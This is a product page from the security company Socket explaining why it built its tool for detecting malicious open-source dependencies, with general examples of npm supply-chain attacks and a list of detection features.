Exciting news!Announcing our $4.6M Series Seed. Learn more
Socket
LoveBlogFAQ
Install
Log in

Why We Built Socket

Open source code makes up 90% of most codebases. It is critical to manage it effectively to reduce your organization's security risk.

Socket detects what vulnerability scanners can’t

It's 2022 and it's no longer sufficient to scan for known vulnerabilities (CVEs) and stop there. And yet, that's what the leading "supply chain security" products do, leaving you vulnerable.

It can take weeks or months for a CVE to be discovered, reported, and detected by tools. But in today's culture of fast development, a malicious dependency can be updated, merged, and running in production in days or even sometimes hours.

Defenders need a new approach to address emerging threats from malicious dependencies:

  • Maintainer intentionally added malware – Rogue maintainer sabotaged his own open source package with 100M downloads/month, affecting companies such as Amazon AWS

  • Package hijacked and poisoned w/ cryptominers and password-stealing malware – Deliberate malware introduced into multiple packages with 30M downloads/month each

  • Package hijacked to add backdoor targeting a specific organization – Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build

  • NPM package manager allowed anyone to publish new versions of any package – Attackers could publish new versions of any NPM package without authorization for multiple years

Using third-party dependencies without proper vetting leaves you open to hacking, breaches, and assorted security misfortune.

The Socket approach: best-in-class malware detection and blocking

Security teams depend on Socket to prevent malicious open source dependencies from infiltrating their apps.

Socket dramatically improves your open source security posture by detecting and blocking the attacks you don't expect – malware, hidden code, typo-squatting, and more – which aren't caught by CVE vulnerability scanners.

  • Block typosquats – Block malicious packages that differ in name by only a few characters, and recommend the correct package

  • Block malware – Block emerging malware threats

  • Detect hidden code – Detect obfuscated, minified, or hidden code

  • Detect privileged API usage – Detect usage of risky APIs – filesystem, network, child_process, environment variables, eval()

  • Detect suspicious updates – Detect updates that significantly change package behavior

Empower developers to take charge of their dependency health

Socket improves security outcomes and reduces work for security teams by surfacing actionable security information directly inline in GitHub so developers are empowered to make better decisions.

  • Five minute deployment – The easiest security product you'll ever deploy in your organization. Just install a GitHub app and you're done.

  • Provide security feedback directly on PRs – Empower developers to solve security issues before they're deployed into production.

  • Automated security – Spend security team resources auditing the highest-impact dependencies, instead of all or nothing.

Interested?

Install our free GitHub App or get in touch at [email protected] for a demo.

Socket

Product

Subscribe to our newsletter

Get open source security insights delivered straight into your inbox. Be the first to learn about new features and product updates.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc